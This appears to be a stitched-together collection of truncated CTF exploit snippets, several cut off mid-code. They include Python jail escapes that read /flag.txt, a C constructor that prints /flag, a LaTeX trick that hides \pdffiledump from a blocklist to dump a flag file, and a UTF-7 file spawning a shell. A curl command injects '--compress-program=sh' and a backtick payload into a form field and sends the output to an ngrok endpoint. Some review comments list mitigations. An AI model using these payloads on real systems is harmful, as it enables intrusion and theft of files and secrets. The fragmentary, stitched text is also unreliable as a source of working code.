from pwn import * | |
import dis | |
def gen_varname() -> str: | |
d = {} | |
class Checker: | |
def __getattribute__(self, __name: str) -> bool: | |
if d.get(__name, False): |
#include <stdio.h> | |
#include <fcntl.h> | |
#include <unistd.h> | |
__attribute__((constructor)) void pwn() { | |
// open /flag and printf it | |
int fd = open("/flag", O_RDONLY); | |
char buf[0x100]; | |
read(fd, buf, 0x100); | |
printf("%s", buf); |
from pwn import * | |
def main() -> None: | |
io = remote("pyjail-revenge.chal.idek.team", 1337) | |
# __import__('__main__').any = all | |
# sys.modules = {'idlelib.pyshell': __import__('__main__')} | |
# import idlelib.idle | |
# https://github.com/python/cpython/blob/206f05a46b426eb374f724f8e7cd42f2f9643bb8/Lib/idlelib/idle.py#L13-L14 |
from opcode import opmap | |
import dis | |
code = b"" | |
code += bytes([opmap["LOAD_CONST"], 0]) | |
code += bytes([opmap["GET_LEN"], 0]) | |
code += bytes([opmap["IMPORT_FROM"], 0]) | |
code += bytes([opmap["ROT_TWO"], 0]) | |
code += bytes([opmap["CALL_FUNCTION"], 1]) |
% Review note: this document never spells the pdfTeX primitive \pdffiledump
% literally. \x holds "pdff", and etoolbox's \csuse assembles the
% control-sequence name from "\x iledump" at expansion time, so a filter that
% scans the submitted source for the primitive's name will not match it.
% Defensive takeaway: source-text blocklists are not a boundary for TeX input.
% Restrict file reads at the engine level (e.g. kpathsea's openin_any setting)
% and compile untrusted documents in a sandbox that cannot see secrets.
\RequirePackage{etoolbox}
\documentclass{article}
% Defines \x only if it is not already defined.
\providecommand{\x}{pdff}
\begin{document}
% Expands to a hexadecimal dump of the first 99 bytes of the named file,
% which is then typeset into the output.
\csuse{\x iledump} offset 0 length 99 {/app/flag}
\end{document}
#!/bin/bash
# Review note: the `filename` form field sent below starts with `--`, so a
# server-side command built from it would parse the value as options instead
# of a file name (option injection). The back-quoted part only matters if that
# command line is also interpreted by a shell. The handler (index.php) is not
# shown here, so how it uses the field is an assumption to confirm.
# Server-side mitigations: validate `filename` against an allowlist, reject
# values beginning with `-`, pass user values after a `--` separator, and
# invoke the program with an argument vector rather than through a shell.
# Detection: request bodies whose filename starts with `-` or contains
# backticks / ${IFS}, and outbound connections from the web host to tunnelling
# or webhook endpoints.

# Out-of-band endpoint that receives the command output.
WEBHOOK="0.tcp.jp.ngrok.io:11048"
# -k disables TLS verification; the response body is discarded (-o /dev/null).
curl -i -s -k -X $'POST' \
-H $'Host: 34.124.157.94:10556' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'filename=--compress-program=sh -z /proc/self/cmdline -o /tmp/lebr0nli`curl${IFS}-d${IFS}$($(echo${IFS}L3JlYWRmbGFnCg==|base64${IFS}-d))${IFS}'"$WEBHOOK"'`' \
$'http://34.124.157.94:10556/index.php' -o /dev/null
# encoding: utf-7 | |
# a+AAo-import os;os.system('sh') | |
# upload this file as index.html to your github pages |
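def gen_payload(name_idx: int) -> str:
    """Return a nested conditional-expression source string.

    The result has the shape
    ``(0 if (0 if 1 else f"{a_0}{a_1}...") else a_N)`` where ``N`` is
    *name_idx* and the f-string holds one ``{a_i}`` placeholder for each
    ``i`` in ``range(name_idx)``.

    Args:
        name_idx: Number of placeholders in the inner f-string, and the
            suffix of the name used in the outer else-arm.

    Returns:
        The generated expression as text; nothing is evaluated here.
    """
    # NOTE(review): the caller is cut off in this listing; presumably the
    # string is embedded in source text that something else evaluates, so
    # the consumer should treat it as untrusted code. Confirm against the
    # full file.
    # join() builds the placeholder run in one pass instead of repeated +=.
    placeholders = "".join(f"{{a_{i}}}" for i in range(name_idx))
    inner = f'(0 if 1 else f"{placeholders}")'
    return f"(0 if {inner} else a_{name_idx})"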
payload = f""" | |
lambda getattr: [getattr(getattr, f"{{x}}") for x in {gen_payload(int(input()))}] |
from pwn import * | |
WEBHOOK_URL = "https://webhook.site/64021412-a0e0-4f76-bde4-3bb705c13da4/" | |
def conn() -> tube:
    """Open the connection this script talks to.

    Returns a pwntools ``remote`` to ``localhost:1337`` when ``args.LOCAL``
    is truthy, otherwise to ``win.the.seetf.sg:5000``.
    """
    # Pick the endpoint first so there is a single connect call.
    host, port = ("localhost", 1337) if args.LOCAL else ("win.the.seetf.sg", 5000)
    return remote(host, port)
from pwn import * | |
with remote("rattler-read.chal.uiuc.tf", 1337) as io: | |
payload = ( | |
""" | |
g=(print(g.gi_frame.f_back.f_back.f_builtins['open']('/flag.txt').read())for x in(0,)) | |
for x in g:0 | |
""".strip() | |
.replace("\n", "\r") | |
.encode() |